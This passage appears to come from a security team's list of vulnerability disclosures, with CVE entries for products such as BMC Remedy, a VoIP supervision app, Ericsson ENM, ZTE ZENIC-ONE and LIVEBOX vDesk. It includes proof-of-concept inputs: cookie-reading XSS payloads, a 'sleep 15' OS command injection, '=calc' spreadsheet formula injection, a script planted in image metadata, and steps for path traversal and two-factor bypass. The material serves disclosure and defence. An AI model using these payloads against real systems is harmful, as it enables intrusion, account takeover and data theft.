Accept-Language: en-US,en;q=0.9

Priority: u=0, i

Connection: close

In the following picture the header host is modified with a domain owned by the attacker (i.e. pentester.com) and the device redirect the user to the website. 

Security Impact

A user could be redirected to malicious website and the attacker could steal sensitive information such user credentials.

Vulnerability Description: Improper Authentication - CWE-287

Software Version: 7.6.04

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-34399

CVSS:

Severity:

Credits: Gabriele Duchi, Marco Ventura, Giulio Pellegrini, Massimiliano Brolli

** UNSUPPORTED WHEN ASSIGNED ** 
An issue was discovered in BMC Remedy Mid Tier 7.6.04. An unauthenticated remote attacker is able to access any user account without using any password.
NOTE: This vulnerability only affects products that are no longer supported by the maintainer and the impacted version for this vulnerability is 7.6.04 only.

Security Impact

By exploiting this vulnerability, an unauthenticated remote attacker can access any user account without using any password.

Vulnerability Description: Improper Neutralization of Input During Web Page Generation ('Stored Cross-site Scripting') - CWE-79

Software Version: 1.6.4

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-31847

CVSSv3: 6.1

Severity: Medium

Credits: Luca Carbone, Fabio Romano, Federico Draghelli, Massimiliano Brolli

Stored Cross-site scripting (XSS) vulnerability allows authenticated and unauthenticated remote attackers to inject arbitrary web script or HTML into HTTP/GET parameter which reflects/store the user input without sanitization.

Step-by-step instructions and PoC

The Web application does not properly check the parameters sent as input from clients before they are re-included within the HTTP pages returned by the application. In particular, the web gui is affected by the stored type of this vulnerability. Due to the lack of validation of user input, it allows an attacker to inject arbitrary javascript code which is then reflected in the Activity Log page of the application. The attack can be performed both pre and post authentication.

Below are the evidences with the vulnerability details and the payloads used.

The below payload is an example. The vulnerability can be exploited using every functionality which generates a log entry in the ActivityLog page of the web application

URL: https://[HOST]/[NODE-NAME]/supervoip/api/v1/logTrace/buttonViewLogTrace/[ANY-STRING]/<img%20src=x%20onerror=alert(document.cookie"))>/it

Payload used to exploit the vulnerability:

Security Impact

Successful attacks of this vulnerability can result in unauthorized access to critical data or complete account takeover.

Vulnerability Description: Improper Access Control – CWE-284

Software Version: 1.6.4

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-31846

CVSv3:

Severity:

Credits: Luca Carbone, Fabio Romano, Federico Draghelli, Massimiliano Brolli

The web application does not restrict or incorrectly restricts access to a resource from an unauthorized actor.

Step-by-step instructions and PoC

Any user without authentication can view data about the client registered to the application. This vulnerability can be exploited in order to gather personal information like phone numbers and emails and can be exploited without authentication.

Below are the evidences with the vulnerability details and the payloads used.

URL: https://[HOST]/[NODE-NAME]/supervoip/api/v1/register/[PHONE-NUMBER]/[ANY-STRING]/[ANY-STRING]/it?columns%5B13%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B13%5D%5Bsearch%5D%5Bregex%5D=false&order%5B0%5D%5Bcolumn%5D=0&order%5B0%5D%5Bdir%5D=asc&start=0&length=10&search%5Bvalue%5D=&search%5Bregex%5D=false

Security Impact

By exploiting this vulnerability on the web application, it was possible to have unauthorized access to personal information about registered clients.

Remediation Steps

Ensure proper authorization level controls of a user requesting access to particular endpoints.

Vulnerability Description: Improper Output Neutralization for Logs - CWE-117

Software Version: 1.6.4

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-31845

CVSSv3:

Severity:

Credits: Luca Carbone, Fabio Romano, Federico Draghelli, Massimiliano Brolli

The product does not neutralize or incorrectly neutralizes output that is written to logs.

Step-by-step instructions and PoC

The web application writes logs using a GET query string parameter. This parameter can be modified by an attacker, so that every action he performs is attributed to a different user. This vulnerability can be exploited without authentication.

Below are the evidences with the vulnerability details and the payloads used.

The below payload is an example. The vulnerability can be exploited using every functionality which generates a log entry in the ActivityLog page of the web application.

Security Impact

An attacker can insert fake log entries and execute malicious actions that will be attributed to other users.

Vulnerability Description: Generation of Error Message Containing Sensitive Information - CWE-209

Software Version: 1.6.4

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-31844

CVSSv3: 5.3

Severity: Medium

Credits: Luca Carbone, Fabio Romano, Federico Draghelli, Massimiliano Brolli

The server does not properly handle application errors. In some cases, this leads to a disclosure of information about the server.

Step-by-step instructions and PoC

An unauthenticated user is able craft specific requests in order to make the application generate an error. Inside this error, some information about the server is revealed, like the absolute path of the source code of the application. This kind of information can help an attacker to perform other attacks against the system. This vulnerability can be exploited without authentication.

Below are the evidences with the vulnerability details and the payloads used.

URL: https://[HOST]/[NODE-NAME]/supervoip/api/v1/auth/login

In the following screenshot, a malformed JSON is submitted. The server responses with an error message containing absolute paths referring to the web application source code.

Security Impact

An attacker can gather information about the system to perform additional attacks.

Vulnerability Description: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') - CWE-78

Software Version: 1.6.4

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-31843

CVSv3:

Severity:

Credits: Luca Carbone, Fabio Romano, Federico Draghelli, Federico Draghelli, Massimiliano Brolli

The Web application does not properly check the parameters sent as input before they are processed on the server side. This allows authenticated users  to execute commands on the Operating System.

Step-by-step instructions and PoC

The application does not properly check the parameters sent as input before they are used to construct an OS command that will be executed on the operating system of the server. Due to the lack of validation of user input, an attacker is allowed to replace and inject arbitrary system commands with the privileges of the application user. This vulnerability is “blind”, meaning that the output of the command is not reflected in the server response.

Below are the evidences with the vulnerability details and the payloads used.

URL: https://[HOST]/[NODE-NAME]/supervoip/api/v1/removeBackup/[REDACTED]/a;sleep%2015;/[ACCESS-TOKEN]/[REDACTED]/it

Payload used to exploit the vulnerability:

Below is a screenshot of the vulnerable functionality. The first step is to request the deletion of a DB backup.

In the generated request, it is possible to inject an OS command. In this case, the command was ‘sleep 15’. In the bottom-right corner of the screenshot, we can see that the server took 15 seconds to respond, meaning the command was executed successfully.

Security Impact

By exploiting the lack of validation mechanisms in the Web app, it was possible to execute arbitrary OS commands on the server.

Vulnerability Description: Use of GET Request Method With Sensitive Query Strings - CWE-598

Software Version: 1.6.4

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-31842

CVSS: 8.8

Severity: High

Credits: Luca Carbone, Fabio Romano, Federico Draghelli, Massimiliano Brolli

The web application inserts the access token of an authenticated user inside GET requests.

Step-by-step instructions and PoC

The query string for the URL could be saved in the browser's history, passed through Referers to other web sites, stored in web logs, or otherwise recorded in other sources. If the query string contains sensitive information such as session identifiers, then attackers can use this information to launch further attacks. Since the access token in sent in GET requests, this vulnerability could lead to complete account takeover.

Below are the evidences with the vulnerability details and the payloads used.

In the following screenshot there is an example of a GET request that contains the access token in the query string. This vulnerability is applicable to almost every functionality of the web application.

Security Impact

An attacker that is able to read the token could access the web application as another user.

Vulnerability Description: Multiple Relative Path Traversal – CWE-23

Software Version: 1.6.4

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-31841

CVSv3: 

Severity: 

Credits: Luca Carbone, Fabio Romano, Federico Draghelli, Massimiliano Brolli

The web server fails to sanitize the input data allowing remote unauthenticated attackers to read arbitrary files on the filesystem.

Step-by-step instructions and PoC

An unauthenticated user can read arbitrary files using multiple functionalities of the web application. An attacker can change the “filename” parameter in the POST request by adding sequences of ‘../’ in order to reference files outside the intended directory. Since the application does not check in which directory the file will be read, an attacker can access any file on the filesystem, including application source code, configuration files and so on.

Affected Endpoints

·       URL: https://[HOST]/[NODE-NAME/supervoip/api/v1/reportTraceBCCAS/buttonViewReportTraceBCCAS/[ANY-STRING]/[ANY-STRING]/it

·       URL: https://[HOST]/[NODE-NAME]/ supervoip/api/v1/logTrace/buttonViewLogTrace/[ANY-STRING]/[ANY-STRING]/it

·       URL: https://[HOST]/[NODE-NAME]/ supervoip/api/v1/reportTrace/buttonViewReportTrace/[ANY-STRING]/[ANY-STRING]/it

·       URL: https://[HOST]/[NODE-NAME]/ supervoip/api/v1/logTraceBCCAS/buttonViewLogTraceBCCAS/[ANY-STRING]/[ANY-STRING]/it

Below are the evidences with the vulnerability details and the payloads used.

Payload used to exploit the vulnerability:

Security Impact

By exploiting this vulnerability on the web portal, it was possible to read arbitrary files on the filesystem.

Remediation Steps

Implement strict validation for input parameters. Check that the path specified within the parameter is restricted only and exclusively to a dedicated directory.

Vulnerability Description: Insufficiently Protected Credentials - CWE-522

Software Version: 1.6.4

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-31840

CVSSv3: 6.5

Severity: Medium

Credits: Luca Carbone, Fabio Romano, Federico Draghelli, Massimiliano Brolli

The web application inserts plain passwords in the HTML source code.

Step-by-step instructions and PoC

An authenticated user is able to edit the configuration of the email server. Once the user access to the edit function, the web application fills the edit form with the current credentials for the email account, including the plain password.

Below are the evidences with the vulnerability details and the payloads used.

URL: https://[HOST]/[NODE-NAME]/supervoip/api/v1/getEmailServer/[ACCESS-TOKEN]/[REDACTED]/it

The page displays the plaintext password of the email address.

When you get to this page, the following request is sent to the server. The response contains the plaintext password of the email address.

Security Impact

By exploiting this vulnerability, it is possible for an attacker to read the password of the mail server.

Vulnerability Description: Absolute Path Traversal - CWE-36

Software Version: 12.1.0-20211215

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-28806

CVSSv3:

Severity:

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

The web server fails to sanitize the input data allowing remote unauthenticated attackers to upload files on the filesystem in an arbitrary path.

Step-by-step instructions and PoC

An unauthenticated user can upload files in an arbitrary path using a specific functionality of the web application.  An attacker can change the “uploadDir” parameter in the POST request (not possible using the GUI) to an arbitrary directory. Since the application does not check in which directory the file will be uploaded, an attacker can perform a variety of attacks that can result in unauthorized access to the server.

Below are the evidences with the vulnerability details and the payloads used. In this case, uploadDir was changed from /var/tmp/external/ to /tmp/

Payload used to exploit the vulnerability:

Security Impact

By exploiting this vulnerability on the web portal it was possible to upload files in an arbitrary path on the filesystem.

Vulnerability Description: Multiple Improper Access Control - CWE-284

Software Version: 12.1.0-20211215

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-28805

CVSSv3:

Severity:

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

The web application does not restrict or incorrectly restricts access to a resource from an unauthorized actor.

Step-by-step instructions and PoC

Any user logged in the web application can view pages or use functionalities that are normally accessible only by specific roles. In some cases, these functionalities can be accessed even without authentication. This vulnerability can be exploited in order to gather critical information or in order to have unauthorized access to some functionalities.

Affected Endpoints

·       URL: https://[HOST]/[NODE-NAME]/IMCSCI-WebGui/advanced-settings.jsp

·       URL: https://[HOST]/[NODE-NAME]/IMCSCI-WebGui /SaveFileUploader

Below are the evidences with the vulnerability details and the payloads used.

URL: https://[HOST]/[NODE-NAME]/IMCSCI-WebGui/advanced-settings.jsp

As an example, a user with the “Administrator” role can access the advanced settings page, which is normally available only to “System Administrator” users. This vulnerability can by exploited by simply inserting the appropriate endpoint in the URL. 

URL: https://[HOST]/[NODE-NAME]/IMCSCI-WebGui/SaveFileUploader

We can access the “Upload file” functionality in order to upload arbitrary files on the filesystem without authentication.

Security Impact

By exploiting this vulnerability on the web application it was possible to have unauthorized access to critical information and functionalities.

Vulnerability Description: Improper Neutralization of Input During Web Page

Generation (‘Stored Cross-site Scripting’) - CWE-79

Software Version: 12.1.0-20211215

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-28804

CVSSv3:

Severity:

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

Stored Cross-site scripting (XSS) vulnerability allows unauthenticated remote attackers to inject arbitrary web script or HTML into HTTP/POST parameter which store the user input without sanitization.

Step-by-step instructions and PoC

The Web application does not properly check the parameters sent as input from clients before they are re-included within the HTTP pages returned by the application. In particular, the web gui is affected by stored type of this vulnerability. Due to the lack of validation of user input, it allows an attacker to modify the HTML code and the expected execution flow could be altered. The attack can be performed without authentication.

Affected Endpoints

·       URL: https://[HOST]/[NODE-NAME]/IMCSCI-WebGui /j_security_check

o   HTTP POST Parameter: j_username

Below are the evidences with the vulnerability details and the payloads used.

URL: https://[HOST]/[NODE-NAME]/IMCSCI-WebGui/j_security_check

Payload used to exploit the vulnerability:

The endpoint is affected by the Stored type of this vulnerability. The first step consists of replacing the value in the “j_username” POST parameter with the malicious javascript code. This value is stored in the application logs and an alert is generated (Authentication failure), which can be displayed by authenticated users. Since this kind of alerts generate a notification on the home page, the javascript code is executed as soon as a user logs into the web GUI. This vulnerability is particularly critical since the attacker does not need any kind of access to the web application in order to exploit it.

Security Impact

Successful attacks of this vulnerability can result in unauthorized access to critical data or complete account takeover.

Vulnerability Description: Improper Neutralization of Formula Elements in a CSV File (‘CSV Injection’) – CWE-1236

Software Version: < 23.1

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-25007

CVSv3: 7.1

Severity: High

Credits: Luca Borzacchiello, Andrea Carlo Maria Dattola, Massimiliano Ferraresi, Massimiliano Brolli

Ericsson Network Manager (ENM), versions prior to 23.1, contains a vulnerability in the export function of application log where Improper Neutralization of Formula Elements in a CSV File can lead to code execution or information disclosure. There is limited impact to integrity and availability. The attacker on the adjacent network with administration access can exploit the vulnerability.

Vulnerability Description: Improper Neutralization of Formula Elements in a XLSX File (‘XLSX Injection’)- CWE-1236

Software Version: 16.22.40

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-22063

CVSS: 9.0

Severity: Critical

Credits: Stefano Carbè, Cristina Coppola, Andrea Carlo Maria Dattola, Stefano Scipioni, Massimiliano Brolli

The vulnerability occurs in ZENIC-ONE ZTE R58, version 16.22.40, when user-supplied information in an Excel (XLSX) file is not neutralized or is neutralized incorrectly so that special elements could be interpreted as a command when the file is opened by a spreadsheet product.

Step-by-step instructions and PoC

A remote user authenticated to the web application “Zenic-One” is able to clone a job from the GUI and, by intercepting the HTTP Request, can inject a payload in the “neId” parameter. Thus, when the Excel report for that job is downloaded by any user, clicking on the infected cell executes the payload on the victim's operating system.

Affected Endpoints

·       URL: https://[IP]:[PORT]/uportal/framework/defaulthtml#/_mw-upgrade-task-management

·       HTTP Parameter: neId

Below is the evidence with the vulnerability details and the payloads used.

This first step consists of the interception of the POST HTTP request generated by the “New” button on the GUI’s  Upgrade Job Section after clicking the 'clone' button of a job.

The second step is changing the value of the neId parameter with a malicious payload.

In this case the following payload has been used: =calc|a!z

The third step is for a user to download the report for that job and open the Excel file locally on his PC.

When a user with the Excel Macro enabled clicks on the infected cell, the injected code is executed.

Security Impact

By exploiting this issue an attacker is able to inject arbitrary formulas into XLSX files.

This can potentially lead to remote code execution at client side (DDE) or to data leakage via maliciously injected hyperlinks.

Vulnerability Description: Improper Neutralization of Input During Web Page Generation ('Reflected Cross-site Scripting') - CWE-79

Software Version: 3, 4, 5

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-20906

CVSv3: 4.8

Severity: Medium

Credits: Maurizio Gatti, Massimo Stifano, Massimiliano Brolli

Vulnerability in the Integrated Lights Out Manager (ILOM) product of Oracle Systems (component: System Management). Supported versions that are affected are 3, 4 and 5. Easily exploitable vulnerability allows high privileged attacker with network access via ICMP to compromise Integrated Lights Out Manager (ILOM). Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Integrated Lights Out Manager (ILOM), attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Integrated Lights Out Manager (ILOM) accessible data as well as unauthorized read access to a subset of Integrated Lights Out Manager (ILOM) accessible data.

Vulnerability Description: Improper Input Validation – CWE-20

Software Version: 10.x, 11.1.1-24 or lower, 12.0.4-18 or lower

NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-7248

CVSv3: 9.8

Severity: Critical

Credits: Gabriele Duchi, Davide Brian Di Campi, Tiziano Di Vincenzo, Massimiliano Brolli

Certain functionality in OpenText Vertica Management console might be prone to bypass via crafted requests.  The vulnerability would affect one of Vertica’s authentication functionalities by allowing specially crafted requests and sequences.

Vulnerability Description: Authorization Bypass Through User-Controlled Key – CWE-639

Software Version: 4.38.6

NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-50811

CVSv3: 6.5

Severity: Medium

Credits: Cristina Coppola, Massimiliano Ferraresi, Andrea Carlo Maria Dattola, Stefano Scipioni, Massimiliano Brolli

SELESTA Visual Access Manager 4.38.6 has Incorrect Access Control.

A remote user, authenticated as receptionist role to the web application “Visual Access Manager”, is able to modify the “computer” POST parameter related to the ID of a specific reception by POST HTTP request interception.

Iterating that parameter, it has been possible to access to the application and take control of many other receptions in addition the assigned one.

Vulnerability Description: Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')

Software Version: 23.70.00

NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-49328

CVSv3: 7.2

Severity: High

Credits: Lucas Gabriel Alves, Francesco Oriolo, Vanderlei Silva de Oliveira Junior, Alessandro Sabetta, Massimiliano Brolli

On a B.POINT server (on premises) running OS Linux, during the authentication phase, a validate system user was potentially able to carry out a “remote code execution (RCE)” attack by exploiting a vulnerability in a “server-to-server” communication module.

Vulnerability Description: Improper Access Control – CWE-284

Software Version: 23.2

NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-39909

CVSv3: 8.8

Severity: High

Credits: Massimiliano Ferraresi, Luca Borzacchiello, Andrea Carlo Maria Dattola, Massimiliano Brolli

Ericsson Network Manager (ENM), versions prior to 23.2, contains a vulnerability where Improper Access Control can lead to unauthenticated users with low privilege to access the NCM application.

Vulnerability Description: Plaintext Storage of a Password ('Improper Password Storage') – CWE-256

Software Version: 17.1.20190111

NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-38328

CVSv3: 4.9

Severity: Medium

Credits: Luca Di Giuseppe, Antonio Papa, Stefano Scipioni, Fabio Minarelli, Massimiliano Brolli

An issue was discovered in eGroupWare 17.1.20190111. An Improper Password Storage vulnerability affects the setup panel of under setup/manageheader.php, which allows authenticated remote attackers with administrator credentials to read a cleartext database password.

Step-by-step instructions and PoC

An authenticated admin user can read database credentials stored in cleartext in the eGroupWare setup panel.

Affected Endpoints

URL:
https://hostname/[REDACTED]/egroupware/setup/manageheader.php

https://hostname/[REDACTED]/egroupware/calendar/freebusy.php

Below are the evidences with the vulnerability details and the payload used.

Security Impact

By By exploiting this vulnerability, it is possible to access the web application’s data stored into the database.

Vulnerability Description: Observable Response Discrepancy - CWE-204

Software Version: 10.12.4 6.0.2

NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-26071

CVSv3: 7.5

Severity: High

Credits: Marco Ventura, Massimiliano Brolli

An issue was discovered in MCUBO ICT through v.10.12.4 – 6.0.2. An Observable Response Discrepancy can occur under the login web page. In particular, the web application provides different responses to incoming requests in a way that reveals internal state information to an unauthorized actor. That allow an unauthorized actor to perform User Enumeration attacks.

Vulnerability Description: Improper Access Control - CWE-284

Software Version: 21B

NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-26062

CVSv3: 7.0

Severity: High

Credits: Massimiliano Ferraresi, Luca Borzacchiello, Massimiliano Brolli

A mobile network solution internal fault is found in Nokia Web Element Manager 21B. Exploit of this vulnerability is not possible from outside of mobile network solution architecture. This means that exploit is not possible from mobile network user UEs, from roaming networks, or from Internet. Exploit is possible only from CSP (Communication Service Provider) mobile network solution internal BTS management network.

Due to this vulnerability, the Nokia Web Element Manager allows an unprivileged user (must be logged in) to execute administrative function.

Step-by-step instructions and PoC

First Step create two users:

·       Nemuadmin (admin)

·       tespt (readonly)

The following evidence shows the read-only functionalities for testpt user:

With an http proxy is possible to intercept the response from login request by tespt and we

change the fields in the response from “profile”:”BTSRead” to “profile”:”Nemuadmin” and

“readOnlyAccess”: true to “readOnlyAccess”: false

And the user testpt will have an access to administrative functions:

Like PoC with testpt (read-only user) we dump the S1 traffic from the BBU:

Security Impact

By exploiting the this vulnerability an attacker can access admin’s functionality with a unprivileged user.

Vulnerability Description: Improper Privilege Management - CWE-269

Software Version: 3.18

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-47531

CVSv3: 8.8

Severity: High

Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli

EPG / vEPG (3.x versions prior to 3.25 and 2.x versions prior to 2.16) contains a vulnerability where Missing Input Validation can lead to authenticated users to bypass system CLI and execute commands they are authorized to execute directly in the UNIX shell. This vulnerability if exploited can lead to limited loss of confidentiality and/or low impact to integrity and availability of the system.

Vulnerability Description: Improper Neutralization of Formula Elements in a CSV File– CWE-1236

Software Version: < 22.1

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-46408

CVSv3: 6.8

Severity: Medium

Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli

Ericsson Network Manager (ENM), versions prior to 22.1, contains a vulnerability in the application Network Connectivity Manager (NCM) where improper Neutralization of Formula Elements in a CSV File can lead to remote code execution or data leakage via maliciously injected hyperlinks. The attacker would need admin/elevated access to exploit the vulnerability.

Vulnerability Description: Open Redirect – CWE-601

Software Version: < 22.2

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-46407

CVSv3: 4.8

Severity: Medium

Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli

Ericsson Network Manager (ENM), versions prior to 22.2, contains a vulnerability in the REST endpoint “editprofile” where Open Redirect HTTP Header Injection can lead to redirection of the submitted request to domain out of control of ENM deployment. The attacker would need admin/elevated access to exploit the vulnerability

Vulnerability Description: Improper Access Control (Export of Users)- CWE-284

Software Version: <= v.018

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45180

CVSv3: 6.5

Severity: Medium

Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli

An issue was discovered in LIVEBOX Collaboration vDesk through v018.Broken Access Control exists under the /api/v1/vdesk_{DOMAIN]/export endpoint.A malicious user, authenticated to the product without any specific privilege, can use the API for exporting information about all users of the system (an operation intended to only be available to the system administrator).

Step-by-step instructions and PoC

A malicious user, authenticated to Collaboration vDesk without any specific privilege, can
use the API for exporting the information about all the users of the system.

Affected Endpoints

·       https://vdeskbridge.[HOSTNAME]/api/v1/vdesk_[DOMAIN] /export

Payload used by an attacker to create arbitrary guest users without authentication:

Security Impact

This vulnerability would allow an attacker, authenticated as guest, to export the data of all
the users registered in the system.

Vulnerability Description: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) – CWE-80

Software Version: ≤v031

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45179

CVSv3: 5.4

Severity: Medium

Credits: Luca Borzacchiello, Andrea Carlo Maria Dattola, Massimiliano Ferraresi, Massimiliano Brolli

Collaboration vDesk through vShare functionality section allow an authenticated attacker to store arbitrary HTML code in order to corrupt the web page (for example creating phishing sections to extrapolate the victims' credentials, etc..).

Step-by-step instructions and PoC

A remote user authenticated to Collaboration vDesk <=v18. can store arbitrary HTML code in the reminder section title. In our Proof-of-Concept, we created a phishing reminder to redirect the victim to an external domain (Open Redirect) or an internal domain affected by Cross Site Scripting.

Affected Endpoints

·       URL: https://vdeskbridge.[HOSTNAME]/api/v1/vdeskintegration/todo/createorupdate

o   HTTP GET Parameter: title

         https://vdesk.[HOSTNAME]/dashboard/reminders

Below is the evidence with details of the vulnerability and the payloads used.

The victim user clicking on the "FATTO" button will initiate the execution of the malicious content present in the "title" field:

Security Impact

An authenticated attacker can store arbitrary HTML code in order to corrupt the web page, for example by creating phishing sections to redirect victim users to redirect victim users to malicious sites or fill them with notifications or exploit other attacks within vDesk in addition to image damage.

Vulnerability Description: Improper Access Control- CWE-284

Software Version: <= v.018

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45178

CVSv3: 8.8

Severity: High

Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli

An issue was discovered in LIVEBOX Collaboration vDesk through v018. Broken Access Control exists under the /api/v1/vdeskintegration/saml/user/createorupdate endpoint, the /settings/guest-settings endpoint, the /settings/samlusers-settings endpoint, and the /settings/users-settings endpoint. A malicious user (already logged in as a SAML User) is able to achieve privilege escalation from a low-privilege user (FGM user) to an administrative user (GGU user), including the administrator, or create new users even without an admin role.

Step-by-step instructions and PoC

A malicious user already logged as SAML User is able to perform privilege Escalation from
FGM to GGU user, including the administrator, or create new users even with admin roles.

Affected Endpoints

·       https://vdeskbridge.[REDACTED]/api/v1/vdeskintegration/saml/user/createorupdate

·       https://vdesk.[REDACTED]/settings/guest-settings

·       https://vdesk.[REDACTED]/settings/samlusers-settings

·       https://vdesk.[REDACTED]/settings/users-settings

Below are the evidences with the vulnerability details and the payloads used:

Security Impact

A user authenticated with SAML is able to change his privileges by making his profile with
high privileges, even admin privileges in the system, causing privilege escalation.

Vulnerability Description: Observable Response Discrepancy – CWE-204

Software Version: ≤v031

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45177

CVSv3: 7.5

Severity: High

Credits: Luca Borzacchiello, Andrea Carlo Maria Dattola, Massimiliano Ferraresi, Massimiliano Brolli

The Web application provides different responses to incoming requests in a way that reveals internal state information to an unauthorized actor outside of the intended control sphere.

Step-by-step instructions and PoC

An attacker, without authentication, through Collaboration vDesk, is able to understand the state of the server and the users inside through the "User Enumeration" vulnerability.

Affected Endpoints

·       https://vdeskbridge.[REDACTED]/api/v1/vdeskintegration/user/isenableuser

·       https://vdeskbridge.[REDACTED]/api/v1/sharedsearch?search=[NAME]+[SURNAME]

·       https://vdesk.[REDACTED]/login

Below is the evidence with details of the vulnerability and the payloads used.

Payload used to exploit the vulnerability:

Security Impact

A user can gain access to confidential information such as the presence of all users on the system by facilitating the password bruteforce phase or by exploiting other vulnerabilities such as "Multiple Broken Access Control".

Vulnerability Description: Improper Neutralization of Input During Web Page Generation ('Stored Cross-site Scripting') - CWE-79

Software Version: <= v031

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45176

CVSSv3: 5.4

Severity: Medium

Credits: Massimiliano Ferraresi, Andrea Carlo Maria Dattola, Luca Borzacchiello, Massimiliano Brolli

Collaboration vDesk through vShare functionality section doesn't check properly the parameters, sent in HTTP requests as input, before saving them in the server. In addition, the JavaScript malicious content is then reflected back to the end user and executed by the web browser.

Step-by-step instructions and PoC

A remote user, authenticated to the Collaboration vDesk web Page, through vShare functionality, can arbitrary upload a malicious file that contains an HTML code, more specifically javascript code inside HTML tags, and share this file to other victim users.

The Web application, in a specific endpoint, does not properly check the parameters into malicious file from clients before is re-included within the HTTP response returned by the application. Due to the lack of validation of user input, allows an attacker to inject arbitrary HTML code and the expected execution flow could be altered.

Affected Endpoints

• URL: https://vdeskbridge.[HOSTNAME]/api/v1/getbodyfile

o HTTP GET Parameter: uri

Below are the evidences with the vulnerability details and the payloads used.

This first step consists to upload a malicious file into vShare section and share it with other victim’s users.

If the victim user opens the vulnerable endpoint the malicious code will be executed:

•           “https://vdeskbridge.[HOSTNAME]/api/v1/getbodyfile?uri=test/xssStored.html”

The attack is also exploitable via a malicious png image. Through the following command, a comment containing malicious javascript code is inserted into the metadata of the png file:

•           exiftool -Comment="><script>alert(1)</script>" currentavatar.png

Having made the upload of the png with modified metadata, the attacker can induce the victim to open the following endpoint and successfully carry out the attack:

•           https://vdeskbridge.[REDACTED]/api/v1/getbodyfile?uri=test/currentavatar.png

Security Impact

By exploiting this issue an attacker is able to target administrator users who are able to access the plugin configuration page within the browser with several type of direct or indirect impacts such as stealing cookies (if the HttpOnly flag is missing from the session cookies), modifying a web page, capturing clipboard contents, keylogging, port scanning, dynamic downloads and other attacks. This type of XSS does require user interaction.

Vulnerability Description: Insecure Direct Object Reference (Cached Files) – CWE-639

Software Version: <= v.018

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45175

CVSv3: 6.5

Severity: Medium

Credits: Luca Borzacchiello, Massimiliano Brolli

An issue was discovered in LIVEBOX Collaboration vDesk through v018. An Insecure Direct Object Reference can occur under the 5.6.5-3/doc/{ID-FILE]/c/{N]/{C]/websocket endpoint. A malicious unauthenticated user can access cached files in the OnlyOffice backend of other users by guessing the file ID of a target file.

Step-by-step instructions and PoC

A malicious user can fool vShare (through a WebSocket) to return a link to the OnlyOffice
cache of text files, even of other users.

The vulnerability can be exploited in the following way:

1.     the attacker opens a text file in his vShare, this will open a websocket towards vdeskoffice;

2.     the attacker looks at the history of websocket requests, and finds the one that asks for the cached file;

the attacker modifies the ID of its own file with the target one. The target ID could be obtained: (a) performing a brute-force attack (32-bit of entropy), (b) looking at the browser 1.     history of the victim, and looking for a link with the following shape: [...]/5.6.5-3/doc/[ID]/... where [ID] is the target file ID.

Payload used to exploit the vulnerability:

Security Impact

Malicious users can access files in cache of other users if they guess the target OnlyOffice’s file ID.

Vulnerability Description: Improper Authentication (Bypass Two-Factor Authentication for SAML Users - Bad Backup Code Check)- CWE-287

Software Version: <= v.018

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45174

CVSv3: 9.8

Severity: Critical

Credits: Antonella Marino, Massimiliano Brolli

An issue was discovered in LIVEBOX Collaboration vDesk through v018. A Bypass of Two-Factor Authentication for SAML Users can occur under the /login/backup_code endpoint and the /api/v1/vdeskintegration/challenge endpoint. The correctness of the TOTP is not checked properly, and can be bypassed by passing any string as the backup code.

Step-by-step instructions and PoC

The application allows a user to set a “Backup Code” to be used during the two-factor
authentication (instead of using the TOTP).
Unfortunately, for SAML users, the correctness of the TOTP is not checked correctly, and
can be bypassed passing any string as backup code.

The vulnerability can be exploited directly from the web-ui by:

1.     logging into the vDesk web application as SAML user;

2.     selecting the “backup code” option;

3.     inserting any string in the form.

Affected Endpoints

·       https://vdeskbridge.[HOSTNAME]/login/backup_code

·       https://vdeskbridge.[HOSTNAME]/api/v1/vdeskintegration/
challenge

Below are the evidences with the vulnerability details and the payloads used.
Payload used to exploit the vulnerability:

Security Impact

By exploiting the lack of validation of the backup code on SAML users, the two-factor
authentication can by bypassed by an attacker

Vulnerability Description: Improper Authentication (Bypass Two-Factor Authentication - Lack of Server-Side Validation) - CWE-287

Software Version: <= v.018

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45173

CVSv3: 9.8

Severity: Critical

Credits: Massimiliano Ferraresi, Massimiliano Brolli

